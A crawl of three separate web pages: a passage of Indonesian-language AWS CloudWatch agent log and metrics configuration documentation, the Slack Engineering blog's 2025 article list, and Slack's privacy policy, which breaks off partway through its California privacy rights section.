"Packets Sent/sec" ], "resources": [ "*" ], "append_dimensions": { "d3": "win_bo" } }, "System": { "measurement": [ "Context Switches/sec", "System Calls/sec", "Processor Queue Length" ], "append_dimensions": { "d1": "win_foo", "d2": "win_bar" } } }, "append_dimensions": { "ImageId": "$ { aws:ImageId}", "InstanceId": "$ { aws:InstanceId}", "InstanceType": "$ { aws:InstanceType}", "AutoScalingGroupName": "$ { aws:AutoScalingGroupName}" }, "aggregation_dimensions" : [["ImageId"], ["InstanceId", "InstanceType"], ["d1"],[]] } } logs bagian ini mencakup kolom berikut: service.name – Opsional. Menentukan nama layanan yang akan digunakan untuk mengisi entitas untuk menemukan telemetri terkait . deployment.environment – Opsional. Menentukan nama lingkungan yang akan digunakan untuk mengisi entitas untuk menemukan telemetri terkait . backpressure_mode – Opsional. Menentukan perilaku ketika CloudWatch agen menelan log lebih cepat daripada yang dapat dikirim ke CloudWatch Log, menghasilkan tekanan balik. Tekanan balik dapat terjadi dari masalah jaringan, pelambatan API, atau volume log tinggi. Agen mendukung nilai-nilai berikut: fd_release — Merilis deskriptor file untuk file yang dihapus selama kondisi tekanan balik. Opsi ini dapat membantu mencegah kelelahan ruang disk ketika rotasi log eksternal atau proses pembersihan menghapus file sementara agen mempertahankan deskriptor file terbuka. auto_removal Opsi ini lebih diutamakan daripada backpressure_mode opsi yang disetel ke. fd_release Ketika auto_removal diaktifkan, CloudWatch agen memproses file hingga selesai tanpa melepaskan deskriptor file. penting Menggunakan fd_release dapat mengakibatkan CloudWatch agen tidak dapat membaca file log hingga selesai, menyebabkan kehilangan log. concurrency – Opsional. Menentukan jumlah penerbit log bersama yang digunakan untuk mempublikasikan file log secara bersamaan ke Log. CloudWatch Jika Anda menghilangkan bidang ini, setiap tujuan file log (grup log, kombinasi aliran) memiliki satu penerbit log bersama, yang dapat menyebabkan kemacetan untuk file besar atau saat menulis beberapa file ke tujuan yang sama. Mengaktifkan konkurensi dapat membantu dengan throughput. logs_collected – Wajib jika bagian logs ini disertakan. Menentukan file log dan log kejadian Windows mana yang harus dikumpulkan dari server. Ini dapat mencakup dua bidang, files dan windows_events . files — Menentukan file log reguler CloudWatch agen untuk mengumpulkan. Ini berisi satu bidang, collect_list , yang selanjutnya mendefinisikan file-file ini. collect_list – Wajib jika files disertakan. Berisi serangkaian entri, masing-masing menentukan satu file log yang akan dikumpulkan. Masing-masing entri ini dapat menyertakan kolom berikut: file_path - Menentukan jalur file log untuk meng-upload ke CloudWatch Log. Aturan pencocokan lob Unix standar diterima, dengan tambahan ** sebagai bintang super besar . Misalnya, menentukan /var/log/**.log menyebabkan semua .log file dalam /var/log pohon direktori yang akan dikumpulkan. Untuk contoh lainnya, silakan lihat Glob Library . Anda juga dapat menggunakan tanda bintang standar sebagai wildcard standar. Misalnya, /var/log/system.log* sesuaikan file seperti system.log_1111 , system.log_2222 , dan lainnya di /var/log . Hanya file terbaru yang didorong ke CloudWatch Log berdasarkan waktu modifikasi file. Kami merekomendasikan bahwa Anda menggunakan wildcard untuk menentukan serangkaian file dari jenis yang sama, seperti access_log.2018-06-01-01 dan access_log.2018-06-01-02 , tetapi tidak banyak jenis file, seperti access_log_80 dan access_log_443 . Untuk menentukan beberapa jenis file, tambahkan | 2026-01-13T09:29:26 |
https://slack.engineering/2025/#main | Engineering at Slack 2025 – Engineering at Slack Skip to main content Articles About --> Search Search Close Search #2025 December 1, 2025 10 min read @Dominic Marks Streamlining Security Investigations with Agents Slack’s Security Engineering team is responsible for protecting Slack’s core infrastructure and services. Our… November 19, 2025 10 min read @Hye Jung Choi Android VPAT journey Background A Voluntary Product Accessibility Template (VPAT) is a document that outlines how well a product… November 6, 2025 18 min read @David Reed Build better software to build software better We manage the build pipeline that delivers Quip and Slack Canvas’s backend. A year ago, we were chasing exciting… October 23, 2025 15 min read @Archie Gunasekara Advancing Our Chef Infrastructure: Safety Without Disruption Last year, I wrote a blog post titled Advancing Our Chef Infrastructure, where we explored the evolution of our… October 7, 2025 11 min read @Sam Bailey Deploy Safety: Reducing customer impact from change It’s mid 2023 and we’ve identified some opportunities to improve our reliability. Fast forward to January 2025.… September 4, 2025 9 min read @Nathan Lehotsky @Ryan Persaud Building Slack’s Anomaly Event Response As cyberattacks evolve to unprecedented levels of sophistication and speed, the time gap between breach… April 14, 2025 6 min read @Dan Carton Optimizing Our E2E Pipeline In the world of DevOps and Developer Experience (DevXP), speed and efficiency can make a big difference on an… March 7, 2025 6 min read @Ian Hoffman @Claire Bowman How we built enterprise search to be secure and private Many don’t know that “Slack” is in fact a backronym—it stands for “Searchable Log of all Communication and… Posts pagination 1 2 Next Articles About --> Careers Slack Developer Blog The Slack Blog Terms of Service Privacy Information Cookie Preferences Your Privacy Choices © 2026 Slack Technologies, LLC, a Salesforce company. All rights reserved. Various trademarks held by their respective owners. scroll to top | 2026-01-13T09:29:26 |
https://slack.com/trust/privacy/privacy-policy | Privacy Policy | Legal | Slack Skip to main content Features COLLABORATION Channels Organize teams and work Slack Connect Work with external partners Messaging Chat with your team Huddles Meet with audio and video Clips Record and share updates CRM Salesforce in Slack Bring Salesforce into the flow of work PROJECT MANAGEMENT Templates Start any task, fast Canvas Create rich, flexible docs Lists Organize, track and manage projects File Sharing Bring files to the flow of work PLATFORM Agentic Platform Customize, extend, and unify your tech stack in Slack Apps & Integrations Connect your tools with Slack Workflow Builder Automate everyday tasks INTELLIGENCE AI in Slack Save time and work smarter with powerfully simple AI Agentforce Empower your whole team with AI-powered agents in Slack Enterprise Search Find anything, all from a single search bar ADMIN & SECURITY Security Protect data, ensure compliance Enterprise Key Management Monitor and revoke access Slack Atlas Discover rich profiles and org charts Watch demo Download Slack Slack Marketplace Find new agents and apps that fit your team’s needs. Browse marketplace What is Slack? Slack vs. Email Accessibility Solutions BY DEPARTMENT Engineering IT Customer Service Sales Project Management Marketing Human Resources Security BY INDUSTRY Manufacturing, Auto & Energy Technology Media Small Business Financial Services Retail Education Health & Life Sciences Watch demo Download Slack See all solutions TEMPLATE GALLERY Start work faster with pre-made templates for every task. See all templates Task Management Scale Engagement Trust Enterprise Resources Resources Library What’s New Product Tour Events Developers Partners Customer Stories Community Slack Certified Blog Slack Marketplace Watch demo Download Slack FEATURED Tips and tricks on getting started with Slack Get started Help Center Customer Support Pricing Search Sign in Request a demo Get started Get started Back Features COLLABORATION Channels Organize teams and work Slack Connect Work with external partners Messaging Chat with your team Huddles Meet with audio and video Clips Record and share updates CRM Salesforce in Slack Bring Salesforce into the flow of work PROJECT MANAGEMENT Templates Start any task, fast Canvas Create rich, flexible docs Lists Organize, track and manage projects File Sharing Bring files to the flow of work PLATFORM Agentic Platform Customize, extend, and unify your tech stack in Slack Apps & Integrations Connect your tools with Slack Workflow Builder Automate everyday tasks INTELLIGENCE AI in Slack Save time and work smarter with powerfully simple AI Agentforce Empower your whole team with AI-powered agents in Slack Enterprise Search Find anything, all from a single search bar ADMIN & SECURITY Security Protect data, ensure compliance Enterprise Key Management Monitor and revoke access Slack Atlas Discover rich profiles and org charts Watch demo Download Slack Slack Marketplace Find new agents and apps that fit your team’s needs. Browse marketplace What is Slack? Slack vs. Email Accessibility Solutions BY DEPARTMENT Engineering IT Customer Service Sales Project Management Marketing Human Resources Security BY INDUSTRY Manufacturing, Auto & Energy Technology Media Small Business Financial Services Retail Education Health & Life Sciences Watch demo Download Slack See all solutions TEMPLATE GALLERY Start work faster with pre-made templates for every task. See all templates Task Management Scale Engagement Trust Enterprise Resources Resources Library What’s New Product Tour Events Developers Partners Customer Stories Community Slack Certified Blog Slack Marketplace Watch demo Download Slack FEATURED Tips and tricks on getting started with Slack Get started Help Center Customer Support Pricing Sign in Request a demo Download Slack Close Navigation Close Navigation Privacy Policy Trust navigation Additional Policies Pages Close Legal Navigation Getting started Overview Privacy Privacy Slack Privacy Policy Privacy FAQ Data Requests Data Requests Data Request Overview Data Request Policy Transparency Report Compliance Compliance Cookie Policy Slack's GDPR Commitment California Consumer Privacy Act (CCPA) FAQ CCPA Metric Disclosure FERPA Compliance Security Security Overview Data Management Data Management Transparency and Control Privacy principles: Search, Learning, and Intelligence Legal Data Management Legal Overview Effective: July 5, 2023 This Privacy Policy describes how Slack collects, uses, and discloses information associated with an identified or identifiable individual (referred to in this Privacy Policy as “Personal Data” ) and what choices you have around this activity. If you have any questions, please don’t hesitate to contact us. When we refer to “ Slack ”, we mean Slack Technologies, LLC or Slack Technologies Limited, as explained in more detail in the “Identifying the Data Controller and Processor” section below. Table of Contents: Applicability of this Privacy Policy Information We Collect and Receive How We Process Your Information and Our Legal Bases for Doing So How We Share and Disclose Information Data Retention Security Age Limitations Changes to this Privacy Policy International Data Transfers Data Protection Officer Identifying the Data Controller and Processor Your Rights California Privacy Rights Data Protection Authority Contacting Slack Applicability of This Privacy Policy This Privacy Policy applies to Slack’s online workplace productivity tools and platform, including the associated Slack mobile and desktop applications (collectively, the “ Services ”), Slack.com and other Slack websites (collectively, the “ Websites ”) and other interactions (e.g., customer service inquiries, user conferences, etc.) you may have with Slack. If you do not agree with this Privacy Policy, then do not access or use the Services, Websites or any other aspect of Slack’s business. For the avoidance of doubt, this is the only privacy policy that applies to Slack. This Privacy Policy does not apply to any third-party applications or software that integrate with the Services through the Slack platform (“ Third-Party Services ”), or any other third-party products, services or businesses who will provide their services under their own terms of service and privacy policy. In addition, a separate agreement governs delivery, access and use of the Services (the “ Customer Agreement ”), including the processing of data such as messages, files or other content submitted through Services accounts (collectively, “ Customer Data ”). The organization (e.g., your employer or another entity or person) that entered into the Customer Agreement (“ Customer ”) controls its instance of the Services (its “ Workspace ”) and any associated Customer Data. If you have any questions about specific Workspace settings and privacy practices, please contact the Customer whose Workspace you use. If you have an account, you can check http://slack.com/account/team for the contact information of your Workspace owner(s) and administrator(s). If you have received an invitation to join a Workspace but have not yet created an account, you should request assistance from the Customer that sent the invitation. California Notice of Collection of Personal Information: We collect the information described below under “Information We Collect and Receive” for the business and commercial purposes described below under “Information Use.” To learn more about exercising your California Privacy Rights please review the “California Privacy Rights” section below. Information We Collect And Receive Slack will collect and receive information through operating the Services and Websites, and through other interactions with Slack. Such information will include Customer Data and other information and data (“ Other Information ”) in a variety of ways: Customer Data . Customers or individuals granted access to a Workspace by a Customer (“ Authorized Users ”) routinely submit Customer Data (such as messages, files or other content submitted through Services accounts) to Slack when using the Services. Other Information. Slack also collects, generates and/or receives the following categories of Other Information: Workspace and account information : To create or update a Workspace account, you or our Customer (e.g. your employer) supply Slack with an email address, phone number, password, domain, and/or other account set up details (for more detail on Workspace creation, click here . In addition, Customers that purchase a paid version of the Services provide Slack (or its payment processors) with billing details such as credit card information, banking information, and/or a billing address. Usage information: Services metadata . When an Authorized User interacts with the Services, metadata is generated that provides additional context about the way that an Authorized User uses the Services. For example, Slack logs the Workspaces, channels, people, features, content, and links you view or interact with, the types of files shared and what Third-Party Services are used (if any) Log data . As with most websites and technology services delivered over the Internet, our servers automatically collect information when you access or use our Websites or Services and record it in log files. This log data may include your Internet Protocol (IP) address, the address of the web page you visited before using the Website or Services, browser type and settings, the date and time the Services were used, information about browser configuration and plugins, and your language preferences. Device information . Slack collects information about devices accessing the Services, including type of device, what operating system is used, device settings, application IDs, unique device identifiers and crash data. Whether we collect some or all of this Other Information often depends on the type of device used and its settings. Location information . We receive information from you, our Customers and other third-parties that helps us approximate your location. We may, for example, use a business address submitted by your employer (who is our Customer) or an IP address received from your browser or device to determine approximate location to assist with localization or for security purposes. Cookie information : Slack uses a variety of cookies and similar technologies in our Websites and Services to help us collect Other Information. For more details about how we use these technologies, and your opt-out controls and other options, please visit our Cookie Policy . Third-Party Services information : A Customer can choose to permit or restrict Third-Party Services for its Workspace and Slack can receive personal data from such Third-Party Services. Typically, Third-Party Services are software that integrate with our Services, and a Customer can permit its Authorized Users to enable and disable these integrations for its Workspace (for more details on third-party application management, settings and permissions, click here ). Slack may also develop and offer Slack applications that connect the Services with a Third-Party Service. Once enabled, the provider of a Third-Party Service may share certain information with Slack. For example, if a cloud storage application you are using is enabled to permit files to be imported to a Workspace, we may receive the user name and email address of Authorized Users, along with additional information that the application makes available to Slack to facilitate the integration. Authorized Users should check the privacy settings and notices in these Third-Party Services to understand what data may be disclosed to Slack. When a Third-Party Service is enabled, Slack is authorized to connect and access Other Information made available to Slack in accordance with our agreement with the provider of the Third-Party Service and any permission(s) granted by our Customer (including, by its Authorized User(s)). Examples of information which Slack may receive in this manner include whether you successfully created a new account or interacted with a third-party application in a way that is attributable to Slack usage activity. We do not, however, receive or store passwords for any of these Third-Party Services when connecting them to the Services. For more information on Slack’s interaction with Third-Party Services, click here . Contact information : In accordance with the consent process provided by your device or other third-party API, any contact information that an Authorized User chooses to import (such as importing an address book to find coworkers and Slack Connect contacts or calendar from a device or API), forward or upload to the Services (for example, when sending emails to the Services) is collected when using the Services. Third-Party data : Slack may receive data about organizations, industries, lists of companies that are customers, Website visitors, marketing campaigns and other matters related to our business from parent corporation(s), affiliates and subsidiaries, our partners, or others that we use to make our own information better or more useful. This data may be combined with Other Information we collect and might include aggregate-level data, such as which IP addresses correspond to zip codes or countries. Or it might be more specific: for example, how well an online marketing or email campaign performed. Audio and video metadata : Slack may receive, capture, and store metadata derived from your use of features such as Slack Huddles or Clips, and additional related data such as data regarding the date and time of your Slack Huddle and the Authorized User that you connected with. Additional information provided to Slack : We also receive Other Information when submitted to our Websites or in other ways, such as responses or opinions you provide if you participate in a focus group, contest, activity or event, feedback you provide about our products or services, information you provide if you apply for a job with Slack, enroll in a certification program or other educational program hosted by Slack or a vendor, request support, interact with our social media accounts or otherwise communicate with Slack. Generally, no one is under a statutory or contractual obligation to provide any Customer Data or Other Information (collectively, “ Information ”). However, certain Information is collected automatically and, if some Information, such as Workspace setup details, is not provided, we may be unable to provide the Services. How We Process Your Information and our Legal Bases for Doing So Customer Data will be used by Slack in accordance with a Customer’s instructions, including to provide the Services, any applicable terms in the Customer Agreement, a Customer’s use of Services functionality, and as required by applicable law. Slack is a processor of Customer Data and the Customer is the controller. Customer may, for example, use the Services to grant and remove access to a Workspace, assign roles and configure settings, access, modify, export, share, and remove Customer Data, and otherwise apply its policies to the Services. Slack uses Other Information to operate our Services, Websites, and business. More specifically, Slack uses Other Information for the following purposes: Compliance With A Legal Obligation: Slack processes Other Information when we comply with a legal obligation including, for example, to access, preserve or disclose certain information if there is a valid legal request from a regulator, law enforcement or others. For example, a search warrant or production order from law enforcement to provide information in relation to an investigation, such as your profile picture or IP address. We use Workspace and account information, Usage information, Cookie information, Third-Party Services Information, Contact information, Third-Party data, Audio and video metadata, and Additional information provided to Slack for compliance with a legal obligation. Legitimate Interests : We rely on our legitimate interests or the legitimate interests of a third-party where they are not outweighed by your interests or fundamental rights and freedoms ("legitimate interests"). We use Workspace and account information, Usage information, Cookie information, Third-Party Services Information, Contact information, Third-Party data, Audio and video metadata, and Additional information provided to Slack for the following legitimate interests: To provide, update, maintain and protect our Services, Websites and business. This includes the use of Other Information to support delivery of the Services under a Customer Agreement, prevent or address service errors, security or technical issues, analyze and monitor usage, trends and other activities, or at an Authorized User’s request. It is in our and your interests to provide, update, maintain and protect our Services, Websites, and business. To develop and provide search, learning and productivity tools and additional features. Slack tries to make the Services as useful as possible for specific Workspaces and Authorized Users. For example, we may: improve search functionality by using Other Information to help determine and rank the relevance of content, channels or expertise to an Authorized User; make Services or Third-Party Service suggestions based on historical use and predictive models; identify organizational trends and insights; customize a Services experience; or create new productivity features and products. It is in our interest and in the interest of Customers and Authorized Users to continuously improve and develop the customer support we provide. To investigate and help prevent security issues and abuse. We may use a variety of tools such as device fingerprinting to prevent issues and abuse. We may process, including in an automated fashion, Other Information to better understand how Slack is used or to prevent spam or abuse. It is in our interest to keep the Service secure and to detect, prevent, and address abuse (such as spam) and to investigate and take action in respect of suspicious activity on the Services. To aggregate or de-identify information. In some cases, we aggregate or de-identify information we have associated with you and use the resulting information, for example, to improve the Services. It is in our interest to research and improve the Services; It is in the interests of Customers and Authorized Users to practice data minimisation and privacy by design in respect of their information. Share information with others including law enforcement and to respond to legal requests. It is in our interest and the interest of the general public to prevent and address fraud, unauthorized use of Slack, violations of our terms or other harmful or illegal activity; to protect ourselves, our users or others, including as part of investigations or regulatory enquiries; or to prevent death or imminent bodily harm. Transfer, store or process your information outside the European Economic Area. As the Websites and Services operate globally, with Customers around the world, we need to share information we collect globally. We carry out necessary transfers outside the European Economic Area, including to Australia, Canada, Japan, India, South Korea, and the United States, to provide, update, maintain and protect our Services, Websites and business. For more information, review the “International Data Transfers” section below. In our and your interests to provide, update, maintain and protect our Services, Websites and business. We use Workspace and account information, Third-Party Services Information, Third-Party data, and Additional information provided to Slack for the following legitimate interests: To communicate with you by responding to your requests, comments and questions. If you contact us, we may use your Other Information to respond. It is in our, our Customers’ and Authorized Users’ interests to facilitate communication (for example to answer questions from Customers). To send service emails and other communications. For example, we may: send you service, technical and other administrative emails, messages, and other types of communications; or contact you to inform you about changes in our Services, our Services offerings, and important Services-related notices, such as security and fraud notices. These communications are considered part of the Services and you may not opt out of them. It is in our Customers and Authorized Users’ interests to address service related issues. We use Workspace and account information and Usage information for the following legitimate interests: For billing, account management and other administrative matters. Slack may need to contact you for invoicing, account management, and similar reasons and we use account data to administer accounts and keep track of billing and payments. It is in our interest to facilitate the effective provision and administration of the Websites and Services. We use Workspace and account information, Usage Information, Cookie information, Third-Party Services Information, Third-Party data, and Additional information provided to Slack for the following legitimate interests: To send marketing emails and other communications. We sometimes send emails about new product features, promotional communications or other news about Slack. These are marketing messages so you can control whether you receive them. If you have additional questions about a message you have received from Slack please get in touch through the contact mechanisms described below. It is in our interest to promote the Websites and Services and send our direct marketing. How We Share and Disclose Information This section describes how Slack may share and disclose Information, as described in the section entitled 'Information We Collect and Receive' above. Customers determine their own policies and practices for the sharing and disclosure of Information to third parties. Slack does not control how a Customer or any third party chooses to share or disclose Information. The Customer’s Instructions. Slack may share and disclose Information in accordance with a Customer’s instructions and with appropriate consent, including any applicable terms in the Customer Agreement and the Customer’s use of Services functionality and in compliance with applicable law and legal process. Some sharing at a Customer’s request may incur additional fees. To enable Slack to follow our Customers’ instructions, Slack provides several administrator controls to allow Customers to manage their Workspaces. For example, we follow our Customers’ instructions to enable or disable Authorized Users use of various features of the Services, such as Clips or Slack Huddles , channel posting permissions , the sharing and visibility of direct messages including files, or whether and how Authorized Users can connect with other organizations’ Workspaces through Slack Connect. We also follow Customer and Authorized User instructions on how an Authorized User’s profile may be displayed within a Customer’s Workspace or when shared through Slack Connect or other features. Customers may also provide their Authorized Users with the ability to adjust the audience and visibility of certain Customer Data. To learn more, visit our Help Center to understand what choices and settings are available. Displaying the Services. When an Authorized User submits Information, it may be displayed or discoverable to other Authorized Users in the same or connected Workspaces or Slack Connect instances. For example, an Authorized User’s email address may be displayed with their Workspace profile, or other profile and organizational information may be displayed to Authorized Users. Please consult the Help Center for more information on Services functionality. Collaborating with Others. The Services provide different ways for Authorized Users working in independent Workspaces to collaborate, such as Slack Connect or email interoperability. Information, such as an Authorized User’s profile and organizational information, may be shared, subject to the policies and practices of the Workspace(s) you use. For example, depending on the settings of your Workspace, to enable connections with other Authorized Users, your profile may be shared or searchable or discoverable by Authorized Users or other users outside of Workspace(s) you belong to, or shared via email when you invite an Authorized User or other user to collaborate via Slack Connect. In many instances, Slack includes either administrator controls or user controls, depending on the use case, with respect to external collaboration. Authorized Users may also decide to expand the visibility of certain content and Customer Data, such as files. Customer access. Owners, administrators, Authorized Users, and other Customer representatives and personnel may be able to access, modify, or restrict access to Information. This may include, for example, your employer using features of the Services to access or modify your profile details, or to export logs of Workspace activity. For information about your Workspace settings, please visit https://slack.com/account/settings . Third-Party service providers and partners. We may engage third-party companies or individuals as service providers or business partners to process Information and support our business. These third parties may, for example, provide virtual computing and storage services, assist Slack with verifying Owners and Customers, or we may share business information to develop strategic partnerships with Third-Party service providers to support our common customers. In this respect, depending on the Third-Party service provided, Slack may share your Information. Additional information about the subprocessors we use to support delivery of our Services is set forth in the Salesforce Infrastructure & Sub-processors Documentation . Our Entrustment and Overseas Transfers document contains supplementary information regarding overseas transfers of personal information. Third-Party Services. A Customer may enable, or permit Authorized Users to enable, Third-Party Services. We require each Third-Party Service provider to disclose all permissions for information accessible through the Services, but we do not guarantee that they do so. When Third-Party Services are enabled by a Customer or an Authorized User, Slack may share Information with Third-Party Services. Third-Party Services are not owned or controlled by Slack and third parties that have been granted access to Information may have their own policies and practices for its collection, use, and sharing. Please check the permissions, privacy settings, and notices for these Third-Party Services or contact the provider for any questions. Forums. The Information you choose to provide in a community forum including personal data will be publicly available. Organizers and sponsors of Events/Webinars. If you attend an event or webinar organized by Slack, we may share your profile and organizational information with the event or webinar sponsors when you register, have your badge scanned, or join a breakout room. If required by applicable law, you may consent to such sharing via the registration form or by allowing your attendee badge to be scanned at a sponsor booth. In these circumstances, your information will be subject to the sponsors’ privacy statements. For more information, please refer to the terms provided when you register for such an event or webinar. Professional advisers. We may share your Information with professional advisers acting as service providers, processors, controllers, or joint controllers - including lawyers, bankers, auditors, and insurers who provide consultancy, banking, legal, insurance and accounting services, and to the extent we are legally obliged to share or have a legitimate interest in sharing your Information containing personal data. Corporate Affiliates. Slack may share Information with our corporate affiliates, parents and/or subsidiaries. During a Change to Slack’s Business. If Slack engages in a merger, acquisition, bankruptcy, dissolution, reorganization, sale of some or all of Slack’s assets or stock, financing, public offering of securities, acquisition of all or a portion of our business, a similar transaction or proceeding, or steps in contemplation of such activities, some or all of the Information described in the ‘Information We Collect and Receive’ section may be shared or transferred, subject to standard confidentiality arrangements. Aggregated or De-identified Data. We may disclose or use aggregated or de-identified Information for any purpose. For example, we may share aggregated or de-identified Information with prospects or partners for business or research. Law Enforcement and Regulators. If we receive a request for information, we may disclose Other Information if we reasonably believe disclosure is in accordance with or required by any applicable law, regulation or legal process. Please review the Data Request Policy , Data Request Overview , and Transparency Report to understand how Slack responds to requests to disclose data from government agencies, law enforcement entities, and other sources. This may at times include information that Slack Technologies, LLC processes on behalf of Slack Technologies Limited in its role as a subprocessor, including as pursuant to the terms of any data protection agreement between Slack and its Customers. To enforce our rights, prevent fraud, and for safety. To protect and defend the rights, property, or safety of Slack, its users, or third parties, including enforcing its contracts or policies, or in connection with investigating and preventing illegal activity, fraud, or security issues, including to prevent death or imminent bodily harm. With Consent. Slack may share Information with third parties when we have consent to do so or as otherwise permitted in this Privacy Policy. For Workspaces registered to corporate entities, Slack may share Information with consent of the Workspace primary owner or authorized corporate officer, or their designee. For workplaces created without a formal affiliation, Slack may require user consent. Data Retention Slack will retain Customer Data in accordance with a Customer’s instructions (including to perform any applicable terms in the Customer Agreement and through Customer’s use of Services functionality) and as required by applicable law. Customer may customize its retention settings and, depending on the Services plan, apply those customized settings at the Workspace level, channel level or other level. The Customer may also apply different settings to messages, files or other types of Customer Data. The deletion of Customer Data and other use of the Services by the Customer may result in the deletion and/or de-identification of certain associated Other Information. Within 24 hours of workspace Primary Owner-initiated deletion, Slack hard deletes all Customer Data from currently-running production systems (excluding team and channel names, and search terms embedded in URLs in web server access logs), and backups are wiped within 14 days. Slack may retain Other Information pertaining to you for as long as necessary for the purposes described in this Privacy Policy (such as to provide the Services, including any optional features you use, and to provide customer support). This may include keeping your Other Information after you have deactivated your account for the period of time needed for Slack to pursue legitimate business interests, conduct audits, comply with (and demonstrate compliance with) legal obligations, resolve disputes, and enforce our agreements. After expiry of the applicable retention periods and uses described above, your Personal Data will be deleted. If there is any data that we are unable, for technical reasons, to delete entirely from our systems, we will implement appropriate measures to prevent any further use of such data. For more detail, please review the Help Center or contact the Customer. Security Slack takes security of data very seriously. Slack works hard to protect Information you provide from loss, misuse, and unauthorized access or disclosure. These steps take into account the sensitivity of the Information we collect, process and store, and the current state of technology. Slack has received internationally recognized security certifications. To learn more about current practices and policies regarding security and confidentiality of the Services, please visit our Security Practices . Given the nature of communications and information processing technology, Slack cannot guarantee that Information during transmission through the Internet or while stored on our systems or otherwise in our care will be absolutely safe from intrusion by others. When you click a link to a third-party site, you will be leaving our site and we don’t control or endorse what is on third-party sites. Age Limitations Slack does not allow use of our Services and Websites by anyone younger than 16 years old, to the extent prohibited by applicable law. If you learn that anyone younger than 16 has unlawfully provided us with personal data, please contact us and we will take steps to delete such information. Changes To This Privacy Policy Slack may change this Privacy Policy from time to time. Laws, regulations, and industry standards evolve, which may make those changes necessary, or we may make changes to our services or business. We will post the changes to this page and encourage you to review our Privacy Policy to stay informed. If we make changes that materially alter your privacy rights, Slack will provide additional notice, such as via email or through the Services. If you disagree with the changes to this Privacy Policy, you should deactivate your Services account. Contact the Customer if you wish to request the removal of Personal Data under their control. To view previous versions of Slack’s Privacy Policy, please visit https://slack.com/policy-archives . International Data Transfers Slack may transfer your Personal Data to countries other than the one in which you live, including transfers to the United States. To the extent that Personal Data is transferred abroad, Slack will ensure compliance with the requirements of the applicable laws in the respective jurisdiction in line with Slack’s obligations. In particular, we offer the following safeguards if Slack transfers Personal Data from jurisdictions with differing data protection laws: European Commission’s Standard Contractual Clauses. Slack uses Standard Contractual Clauses approved by the European Commission (and the equivalent standard contractual clauses for the UK where appropriate) for transfers to, among others, Australia, Canada, India, Japan, South Korea, and the United States. Slack will transfer your Personal Data to facilitate the provision of the Services. A copy of our standard data processing addendum, incorporating the Standard Contractual Clauses, is available here , and a copy of the executed version of the Standard Contractual Clauses may be obtained by contacting us as described in the “Contacting Slack” section below. Asia-Pacific Economic Cooperation Cross-Border Privacy Rules System And Privacy Recognition For Processors. Slack’s privacy practices, described in this Privacy Policy, comply with the Asia-Pacific Economic Cooperation (“APEC”) Cross Border Privacy Rules (“CBPR”) system and the Privacy Recognition for Processors (“PRP”). The APEC CBPR system provides a framework for organizations to ensure protection of personal data transferred among participating APEC economies and the PRP demonstrates an organization’s ability to provide effective implementation of a personal data controller’s privacy obligations related to the processing of personal information. If you have an unresolved privacy or data use concern related to our APEC CBPR or PRP certifications that we have not addressed satisfactorily, you may contact our third-party dispute resolution provider. You may refuse to transfer your personal data overseas, but doing so may restrict your use of Slack. If you do not wish to have your personal data transferred overseas, you may request the deletion of your Slack Profile Information by contacting us at privacy@slack.com or by filling out this form . Data Protection Officer To communicate with our Data Protection Officer, please email dpo@slack.com . Identifying The Data Controller And Processor Data protection law in certain jurisdictions differentiates between the “controller” and “processor” of information. In general, Customer is the controller of Customer Data. In general, Slack is the processor of Customer Data and the controller of Other Information. Different Slack entities provide the Services in different parts of the world. Slack Technologies Limited , an Irish company based in Dublin, Ireland, is the controller of Other Information and a processor of Customer Data relating to Authorized Users who use Workspaces established for Customers outside of the U.S. and Canada. Slack Technologies , LLC, a U.S. company based in San Francisco, California is the controller of Other Information and a processor of Customer Data relating to Authorized Users who use Workspaces established for Customers in the US and Canada. Your Rights Individuals in the European Economic Area, the United Kingdom, Brazil, and across the globe have certain statutory rights in relation to their personal data. Subject to any exemptions provided by law, you may have the right to request access to your personal information, as well as to seek to update, delete, or correct this information. You can do this using the settings and tools provided in your Services account. If you cannot use the settings and tools, contact the Customer who controls your workspace for additional access and assistance. Please check https://slack.com/account/settings for Customer contact information. To the extent that Slack’s processing of your Personal Data is subject to the General Data Protection Regulation or other applicable laws requiring a legal basis for processing Personal Data, such as the UK Data Protection Act and the Brazilian General Data Protection Act (Lei Geral de Proteção de Dados), Slack primarily relies on its legitimate interests, described above, to process your Personal Data. Where we rely on legitimate interests to process your Personal Data, you can object to that processing by contacting us as described in the “Contacting Slack” section below. In response to your objection, we will stop processing your information for the relevant purposes unless we have compelling grounds in the circumstances or the processing is necessary in the context of legal claims. Slack may also process Other Information that constitutes your Personal Data for direct marketing purposes and you have a right to object to Slack’s use of your Personal Data for this purpose at any time. Your California Privacy Rights This section provides additional details about the personal information we collect about California consumers and the rights afforded to them under the California Consumer Privacy Act or “CCPA,” as amended by the California Privacy Rights Act or “CPRA”. California law requires that we detail the categories of personal information that we collect and disclose for certain “business purposes,” such as to service providers that assist us with securing our services or marketing our products, and to such other entities as described in earlier sections of Privacy Policy. In addition to the information provided above in the ‘Information We Collect And Receive’ section, we collect the following categories of personal information from you, your employer, data analytics providers, data brokers, and Third-Party Services for our business purposes: Identifiers/contact information; Commercial information; Internet or electronic network activity information; Financial information; Geolocation information; Professional or employment-related information; Audio and visual data; In limited circumstances where allowed by law, information that may be protected under California or United States law; and Inferences drawn from any of the above categories. We collect this information for the business and commercial purposes described in the ‘ How We Process your Information and our Legal Bases for Doing So ’ section above. We share this information as described in the ‘ How We Share and Disclose Information ’ section above. Slack does not sell (as such term is defined in the CCPA or otherwise) the personal information we collect (and will not sell it without providing a right to opt out). We may also share personal information (in the form of identifiers and internet activity information) with third party advertisers for purposes of targeting advertisements on non-Slack websites, applications, and services. In addition, we may allow third parties to collect personal information from our sites or services if those third parties are authorized service providers who have agreed to our contractual limitations as to their retention, use, and disclosure of such personal information, or if you use our sites or services to interact with third parties or direct us to disclose your personal information to third parties. Subject to certain limitations, the CCPA provides California consumers the right to request to know more details about the categories or specific pieces of personal information we collect (including how we use, disclose, or may sell this information), to delete their personal information, to opt out of any “sales”, to know and opt out of sharing of personal information for delivering advertisements on non-Slack websites, and to not be discriminated against for exercising these rights. California consumers may make a request pursuant to their rights under the CCPA by contacting us at privacy@slack.com or by filling out this form . We will verify your request using the information associated with your account, including email address. Government identification may be required. Consumers can also designate an authorized agent to exercise these rights on their behalf. Authorized agents must submit proof of authorization. If you would like to opt-out of sharing activity based on your cookie identifiers, turn on a Global Privacy Control in your web browser or browser extension. Please see the California Privacy Protection Agency’s website at https://oag.ca.gov/privacy/ccpa for more information on valid Global Privacy Controls. If you would like to opt-out of sharing activity based on other identifiers (like email address or phone number), contact us in accordance with the “Contacting Slack” section, below. For more information on Slack’s role and obligations 